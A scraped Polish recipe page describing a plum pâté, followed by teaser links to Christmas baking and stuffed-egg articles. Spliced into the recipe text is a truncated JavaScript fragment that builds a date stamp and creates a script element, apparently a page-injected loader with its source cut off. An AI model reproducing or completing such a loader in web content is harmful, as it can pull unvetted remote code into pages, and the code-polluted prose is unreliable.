Przepis na : śniadanie
Kilka składników, nieco roboty i masz wyjątkowo smaczny pasztet ze śliwką. Wbrew pozorom, jego przygotowanie wcale nie jest trudne. Wyjdzie wilgotny i puszysty, jeśli tylko będziesz przestrzegać kilku prostych zasad. Doskonale sprawdzi się w roli przekąski dla gości na imprezach i na świątecznym stole. A gdy już raz przygotujesz pasztet ze śliwką, z pewnością będziesz często wracać do tego przepisu. var stamp = parseInt(new Date().getTime()/86400, 10);var script = document.createElement('script');script.setAttribute('type', 'text/javascript');s...
Ciasta na Święta Bożego Narodzenia to w ostatnich dniach bardzo często przeszukiwane hasło w Internecie.
Czytaj dalej...Jajka faszerowane to świetna alternatywa dla zwykłych jajek. Możemy je nadziać pieczarkami, pomidorami, czy też różnego rodzaju rybami.
Czytaj dalej...Święta Bożego Narodzeniu tuż tuż.. Tak więc większość z nas zastanawia się co przygotować na świąteczne menu.
Czytaj dalej...